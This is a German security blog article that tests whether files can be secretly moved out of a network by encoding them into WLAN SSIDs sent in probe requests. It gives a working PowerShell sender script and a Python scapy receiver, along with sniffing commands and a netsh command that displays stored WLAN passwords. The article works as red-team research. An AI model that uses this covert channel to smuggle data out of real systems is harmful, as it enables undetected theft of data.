Datentransfer über SSID - Ein Experiment

Datentransfer über SSID

Ein Experiment

Tomaso Vasella
von Tomaso Vasella
am 09. Februar 2023
Lesezeit: 17 Minuten

Keypoints

  • SSID steht für Service Set IDentifier und identifiziert ein Drahtlosnetzwerk (WLAN)
  • SSIDs können bis zu 32 Bytes Daten beinhalten
  • Datenexfiltration bezeichnet unautorisierten, absichtlich durchgeführten Datenexport
  • Datenabflüsse können schwierig zu entdecken und zu verhindern sein
  • Es gibt sehr viele Mittel und Wege, Datenabflüsse zu bewerkstelligen
  • Datenexfiltration ist oft ein Bestandteil von Red Team Tests

Bei vielen Sicherheitsvorfällen werden Daten kompromittiert und abgezogen; Datenpannen oder Datenlecks sind gefürchtete Vorfälle, die für die betroffenen Organisationen grossen Schaden bedeuten können. Daten können über sehr viele Wege transferiert werden, grundsätzlich ist jegliche Art der Informationsübermittlung für entsprechenden Missbrauch zwecks Datenexfiltration denkbar. Ein häufiges Ziel von Akteuren besteht darin, ausgehende Datentransfers so zu gestalten, dass sie nicht einfach entdeckt werden können und Vorkehrungen zum Verhindern ungewollter Datenflüsse zu umgehen. Dabei werden häufig legitime Werkzeuge wie Betriebssystemtools oder benötigte Funktionalitäten wie DNS in unvorhergesehener Weise eingesetzt, aber auch normale Arbeitsmittel wie Email oder Uploads auf einen Cloudspeicher werden verwendet. Der Kreativität sind dabei kaum Grenzen gesetzt und je nachdem, wie viel Aufwand ein Akteur investiert, können solche Datenflüsse sehr schwierig zu entdecken und zu verhindern sein. In diesem Beitrag wird untersucht, ob Daten über die Netzwerkkennung von Drahtlosnetzwerken (Service Set Identifier, SSID) transferiert werden können, ohne dabei eine Verbindung mit einem Drahtlosnetzwerk herzustellen.

Drahtlosnetzwerke und SSIDs

Das IEEE (Institute of Electrical and Electronics Engineers) definiert Wireless Local Area Networks (WLANs) im Standard IEEE 802.11-2020

SSIDs

Im IEEE Standard 802.11 ist der Begriff Service Set als eine Gruppe von Netzwerkgeräten definiert, die Drahtlos miteinander kommunizieren und dabei eine gemeinsame Service Set Identifikation (SSID) verwenden. Die SSID wird meistens als für Menschen lesbare Bezeichnung von Drahtlosnetzwerken verwendet. Gemäss Kapitel 9.4.2.2 des Standards darf sie zwischen 0 und 32 Octets (Bytes) lang sein und beinhaltet in der Regel ASCII- oder UTF-8-codierte Zeichen (womit auch Emoji-SSIDs möglich sind). Der Standard definiert zwar die maximale Länge einer SSID, schreibt aber nicht vor, dass diese Bytes lesbare Zeichen sein müssen. Dementsprechend können grundsätzlich irgendwelche Daten als SSID verwendet werden, wobei nicht alle Netzwerkgeräte korrekt mit Daten umgehen können, die keine lesbaren Zeichen repräsentieren.

SSIDs und Probe Requests

Ein Netzwerkgerät, das sich mit einem Drahtlosnetzwerk verbinden möchte, muss dessen SSID kennen. Verfügbare WLAN-Netzwerke können passiv oder mit aktivem Probing gefunden werden. Bei der passiven Detektion wartet das Netzwerkgerät auf entsprechende Signale (Beacons), bei der aktiven Detektion versendet das Gerät selbst Probe Requests, die mit einer Probe Response beantwortet werden können. Die Beacons und die Probe Requests sind WLAN Management Frames, sie sind nicht verschlüsselt und beinhalten die SSID. Geräte wie Mobiltelefone oder Laptops merken sich üblicherweise die Kennungen von Drahtlosnetzwerken, mit denen sie einmal verbunden waren und prüfen anschliessend regelmässig deren Verfügbarkeit. Dies kann dazu missbraucht werden, Geräte zu identifizieren, da die Liste der von ihnen gespeicherten Netzwerkkennungen in der Regel für jedes Gerät individuell ist und es sehr einfach ist, solche Probe Requests mitzulesen. Es ist möglich, sich mit einem Drahtlosnetzwerk zu verbinden, dessen SSID man selbst angibt, beispielsweise wenn das gewünschte Netzwerk seine Präsenz nicht mit Beacons ankündet.

Wireless Sniffing

Um in Drahtlosnetzwerken Daten mitzulesen, braucht es einen WLAN-Adapter, der sich in den Monitor- bzw. RFMON-Mode versetzen lässt. Ohne Monitor-Mode können zwar auch Daten mitgelesen werden, nicht aber die hier interessanten Management-Frames. In den folgenden Beispielen wurde dazu ein Edimax USB WLAN Adapter und ein mit Linux betriebenes Raspberry Pi 3 verwendet.

Anzeige der vorhandenen WLAN-Geräte:

[root@pi ~]# iw dev
phy#0
        Interface wlan0
                ifindex 3
                wdev 0x1
                addr 74:da:38:5e:28:d4
                type managed
                txpower 20.00 dBm

Der Monitor-Mode lässt sich mit folgenden Befehlen aktivieren:

[root@pi ~]# ip link set wlan0 down
[root@pi ~]# iw wlan0 set monitor control
[root@pi ~]# ip link set wlan0 up
[root@pi ~]# iw dev
phy#0
        Interface wlan0
                ifindex 3
                wdev 0x1
                addr 74:da:38:5e:28:d4
                type monitor
                channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
                txpower 20.00 dBm

Alternativ kann man auch tcpdump mit der Option -I verwenden, um den Monitor-Mode zu aktivieren. Mit folgendem Befehl können die Probe-Requests von WLAN-Geräten mitgelesen werden, wobei die von den Geräten gesuchten SSIDs in Klammern angezeigt werden:

[root@pi ~]# tcpdump -l -I -i wlan0 type mgt subtype probe-req
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on wlan0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), snapshot length 262144 bytes
16:17:29.799453 311849621us tsft 1.0 Mb/s 2412 MHz 11b -74dBm signal antenna 0 Probe Request (UPC1347F35 5ghz) [1.0* 2.0* 5.5* 11.0* Mbit]
16:17:48.053735 330104063us tsft 1.0 Mb/s 2412 MHz 11b -84dBm signal antenna 0 Probe Request (WDF) [1.0 2.0 5.5 11.0 Mbit]
16:18:08.271175 350321249us tsft 1.0 Mb/s 2412 MHz 11b -84dBm signal antenna 0 Probe Request (Swisscom_Auto_Login) [1.0* 2.0* 5.5* 11.0* Mbit]
16:18:40.048871 382098628us tsft 1.0 Mb/s 2412 MHz 11b -72dBm signal antenna 0 Probe Request (UPC1347F35 5ghz_2GEXT) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
16:18:42.056611 384106457us tsft 1.0 Mb/s 2412 MHz 11b -80dBm signal antenna 0 Probe Request (Swisscom_Auto_Login) [1.0* 2.0* 5.5* 11.0* Mbit]
16:19:46.313880 448363889us tsft 1.0 Mb/s 2412 MHz 11b -82dBm signal antenna 0 Probe Request (zvv2) [1.0* 2.0* 5.5* 6.0 11.0* 12.0 24.0 36.0 Mbit]

Datentransfer über SSIDs

Wie wir gesehen haben, kann man selbst SSIDs definieren, nach denen ein Gerät anschliessend mittels Probe Requests sucht und man kann diese Probe Requests bzw. die darin enthaltenen SSIDs einfach mitlesen. Damit braucht es für einen erfolgreichen Datentransfer nur noch folgendes:

Gemäss Spezifikation darf ein solcher Block maximal 32 Bytes gross sein, darf aber irgendwelche Daten enthalten. In einem ersten Versuch wurden deshalb direkt die Bytes der zu versendenden Daten in die SSIDs geschrieben. Es zeigte sich aber, dass die Verwendung von Bytes, die keine ASCII- oder Unicode-Repräsentation haben, zu Datenverlust führten, vermutlich aufgrund von Treibereinschränkungen auf der Sender- oder Empfängerseite. Aus diesem Grund wurde entschieden, die Daten mit Base64 zu Codieren, was aber leider den Nachteil hat, dass die Datengrösse beträchtlich zunimmt.

WLAN-Profile unter Windows

Um einen realistischen Fall abzubilden, wurde als Senderseite eine Windows 10 Installation verwendet. Windows legt die Informationen über Drahtlosnetzwerke in WLAN-Profilen ab, die sich im XML-Format exportieren und importieren lassen. Auf der Kommandozeile kann man die Profile mit dem Befehl netsh anzeigen und bearbeiten:

PS C:\> netsh wlan show profiles

Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : WLAN-37CV3P
    All User Profile     : Fon
    All User Profile     : MikroTik-1CX987 2
    All User Profile     : MikroTik-1CX987
    All User Profile     : Swisscom_Wifi
    All User Profile     : FRITZ!Box F840 HC
    All User Profile     : Swisscom-GUEST-1

Bemerkung: mit netsh wlan show profiles name=<name> key=clear können auch die in WLAN-Profilen gespeicherten Passwörter angezeigt werden.

Möchte man sich per Kommandozeile mit einem noch nicht gespeicherten Netzwerk verbinden, muss zuerst ein entsprechendes Profil definiert werden. Es hat die folgende Struktur:

<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
   <name>Profile Name</name>
   <SSIDConfig>
      <SSID>
         <name>SSID</name>
      </SSID>
      <nonBroadcast>true</nonBroadcast>
   </SSIDConfig>
   <connectionType>ESS</connectionType>
   <connectionMode>manual</connectionMode>
   <MSM>
      <security>
         <authEncryption>
            <authentication>open</authentication>
            <encryption>none</encryption>
            <useOneX>false</useOneX>
         </authEncryption>
      </security>
   </MSM>
</WLANProfile>

Anschliessend kann es importiert werden:

netsh wlan add profile filename=profile.xml

Es kann nun versucht werden, die Verbindung aufzubauen:

netsh wlan connect name="Profile Name"

Diese Schritte kann man mit einer frei definierbaren SSID durchführen, wobei der letztgenannte Befehl dazu führt, dass Windows die gewünschten Probe Requests versendet. Das Experiment zeigte, dass immer etwa drei oder vier Probe Requests versendet werden, was sich hinsichtlich der Zuverlässigkeit der Datenübertragung als nützlich herausstellte.

Sender

Mit diesen Informationen ausgestattet wurde nun das nachfolgende Powershell-Skript erstellt. Es komprimiert die zu übertragende Datei und automatisiert anschliessend die Erstellung der WLAN-Profile und das Versenden der gewünschten Probe-Requests. Dabei wird für jeden Datenblock ein neues WLAN-Profil temporär erstellt und anschliessend wird versucht, sich mit diesem Profil zu verbinden, was die gewünschten Probe-Request auslöst.

# Name of the created WLAN profiles
$profileName = "WLAN-1CE987"
# prefix to identify our own chunks / probe requests. Could also use MAC address and save 2 bytes.
$magic = ":)"
# start data identifier
$sod = "SOD"
# end data identifier
$eod = "EOD"

$file = $args[0]
$bytes = [System.IO.File]::ReadAllBytes("$file")

[System.IO.MemoryStream] $memStream = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $memStream, ([IO.Compression.CompressionMode]::Compress)
$gzipStream.Write( $bytes, 0, $bytes.Length )
$gzipStream.Close()
$memStream.Close()
$bytesCompressed = $memStream.ToArray()

$b64 = [System.Convert]::ToBase64String($bytesCompressed)
$split = $b64 -split '(.{30})' | Where-Object {$_}

$WirelessProfile = @'
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
   <name>{0}</name>
   <SSIDConfig>
      <SSID>
         <name>{1}{2}</name>
      </SSID>
      <nonBroadcast>true</nonBroadcast>
   </SSIDConfig>
   <connectionType>ESS</connectionType>
   <connectionMode>manual</connectionMode>
   <MSM>
      <security>
         <authEncryption>
            <authentication>open</authentication>
            <encryption>none</encryption>
            <useOneX>false</useOneX>
         </authEncryption>
      </security>
   </MSM>
</WLANProfile>
'@

$tempProfileXML = [System.IO.Path]::GetTempPath() + [Guid]::NewGuid().ToString() + ".xml"

Write-Host -NoNewline "Sending $($split.Count) data chunks"
$WirelessProfile -f $profileName, $magic, $sod | Out-File $tempProfileXML
netsh wlan add profile filename=$tempProfileXML *> $null
netsh wlan connect name="$profileName" *> $null

Foreach ($chunk in $split) {
   Write-Host -NoNewline "."
   $WirelessProfile -f $profileName, $magic, $chunk | Out-File $tempProfileXML
   netsh wlan add profile filename=$tempProfileXML *> $null
   netsh wlan connect name="$profileName" *> $null
}

$WirelessProfile -f $profileName, $magic, $eod | Out-File $tempProfileXML
netsh wlan add profile filename=$tempProfileXML *> $null
netsh wlan connect name="$profileName" *> $null
Write-Host "Done."

netsh wlan delete profile name="$profileName" *> $null
Remove-Item $tempProfileXMLEmpfänger

Auf der Empfängerseite wurde das Mitlesen der Daten mit Python und der Bibliothek scapy realisiert. Scapy erlaubt das mitlesen von Netzwerkverlehr und bietet die Möglichkeit, für jedes empfangene Paket eine Funktion (Callback) auszuführen, ist also ideal geeignet für die beabsichtigten Zwecke. Für unsere Anwendung sind nur Probe Requests interessant, diese lassen sich mit einer geeigneten Filteranweisung herausfiltern. Scapy verwendet dafür wie auch tcpdump den BPF-Syntax für die Filterregeln.

#!/usr/bin/env python3

print('Initializing... ', end='', flush=True)

import codecs
import base64
import gzip
from scapy.all import sniff, Dot11ProbeReq

iface = 'mon0'

magic = ':)'
sod = 'SOD'
eod = 'EOD'
outfile = 'outfile'

last_ssid = ''
cnt = 0
buf = ''

def handler(p):
    global last_ssid
    global cnt
    global buf

    ssid = codecs.decode(p[Dot11ProbeReq].info, 'ascii')

    if ssid.startswith(magic) and ssid != last_ssid:
        last_ssid = ssid
        if ssid == magic + sod:
            buf = ''
            cnt = 0
            print("Got start of data, recording data", end='', flush=True)
        elif ssid == magic + eod:
            print(f"\nGot end of data after {cnt} chunks. Writing to {outfile}.")
            try:
                with open(outfile, 'wb') as of:
                    of.write(gzip.decompress(base64.b64decode(buf)))
            except Exception:
                print(f'Error decompressing/writing data. Incomplete transfer?')
            buf = ''
            cnt = 0
        else:
            print(".", end='', flush=True)
            buf += ssid[2:]
            cnt += 1

if __name__ == "__main__":
    print('Ready, listening for probe requests.')
    sniff(iface=iface, filter='type mgt subtype probe-req', prn=handler, store=0)

Ein Mitlesen der Probe Reqests auf Empfängerseite sieht dann etwa folgendermassen aus:

[root@pi ~]# tcpdump -l -I -i wlan0 type mgt subtype probe-req
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on wlan0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), snapshot length 262144 bytes
17:15:35.896536 3797924875us tsft 1.0 Mb/s 2412 MHz 11b -44dBm signal antenna 0 Probe Request (:)SOD) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:35.947552 3797975842us tsft 1.0 Mb/s 2412 MHz 11b -48dBm signal antenna 0 Probe Request (:)SOD) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:35.964723 3797993055us tsft 1.0 Mb/s 2412 MHz 11b -52dBm signal antenna 0 Probe Request (:)SOD) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:38.133580 3800161690us tsft 1.0 Mb/s 2412 MHz 11b -44dBm signal antenna 0 Probe Request (:)H4sIAAAAAAAEAI2X9VfTjePF34xwE5) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:38.201369 3800229475us tsft 1.0 Mb/s 2412 MHz 11b -52dBm signal antenna 0 Probe Request (:)H4sIAAAAAAAEAI2X9VfTjePF34xwE5) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:39.332881 3801360989us tsft 1.0 Mb/s 2412 MHz 11b -44dBm signal antenna 0 Probe Request (:)AQBCYxRULBAdIgMJTuGg8qNWE00h1u) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:39.380217 3801408295us tsft 1.0 Mb/s 2412 MHz 11b -46dBm signal antenna 0 Probe Request (:)AQBCYxRULBAdIgMJTuGg8qNWE00h1u) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:39.397404 3801425508us tsft 1.0 Mb/s 2412 MHz 11b -50dBm signal antenna 0 Probe Request (:)AQBCYxRULBAdIgMJTuGg8qNWE00h1u) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:41.958555 3803986634us tsft 1.0 Mb/s 2412 MHz 11b -48dBm signal antenna 0 Probe Request (:)gICkDEVCWmDSHSJsSvmAdIiEjO6SGl) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
17:15:42.005754 3804033835us tsft 1.0 Mb/s 2412 MHz 11b -46dBm signal antenna 0 Probe Request (:)gICkDEVCWmDSHSJsSvmAdIiEjO6SGl) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]

Zusammenfassung

Das Experiment zeigte sich als erstaunlich erfolgreich, Daten konnten unter geeigneten Bedingungen einfach und ohne Datenverlust (Vergleich der Hashwerte) übertragen werden. Allerdings ist die Geschwindigkeit sehr bescheiden, es konnten nur Transferraten von 11 – 12 Bytes pro Sekunde erreicht werden; die Übertragung einer 3.5 KB grossen Datei dauerte über 5 Minuten. Hauptgrund dafür dürfte die Zeit sein, die Windows mit dem Versuch verbringt, sich mit den automatisch generierten WLAN-Profilen zu verbinden. Zu Testzwecken wurden die Verbindungsbefehle automatisch nach jeweils 500 Millisekunden terminiert anstatt zu warten, bis sie selbst enden; dies beschleunigte zwar den Ablauf, führte aber zu beträchtlichem Verlust an Probe Requests und damit zu Datenverlust.

Ausserdem wurde festgestellt, dass die Übertragung anfällig auf Störsignale ist: Ein sich direkt neben dem Empfänger befindliches Bluetooth-Headset hat zum Verlust einzelner Datenpakete bzw. Probe Requests geführt.

Datenversand und -Empfang

Zusammenfassend lässt sich sagen, dass diese Methode eher nicht in realen Red Team Einsätzen verwendet werden kann, weil sie zu langsam und zu störanfällig ist. Für kleine Datenmengen oder in besonderen Fällen könnte es aber eine nützliche, wenn auch etwas umständliche Option sein.

Über den Autor

Tomaso Vasella

Tomaso Vasella hat seinen Master in Organic Chemistry an der ETH Zürich abgeschlossen und ist seit 1999 im Bereich Cybersecurity aktiv. Positionen als Berater, Engineer, Auditor und Business Developer zählen zu seinen Erfahrungen. (ORCID 0000-0002-0216-1268)

Links

Haben Sie Interesse an einem Penetration Test?

Unsere Spezialisten kontaktieren Sie gern!

×
Security Testing

Security Testing

Tomaso Vasella

Das neue NIST Cybersecurity Framework

Das neue NIST Cybersecurity Framework

Tomaso Vasella

Flipper Zero WiFi Devboard

Flipper Zero WiFi Devboard

Tomaso Vasella

Denial of Service Angriffe

Denial of Service Angriffe

Tomaso Vasella

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv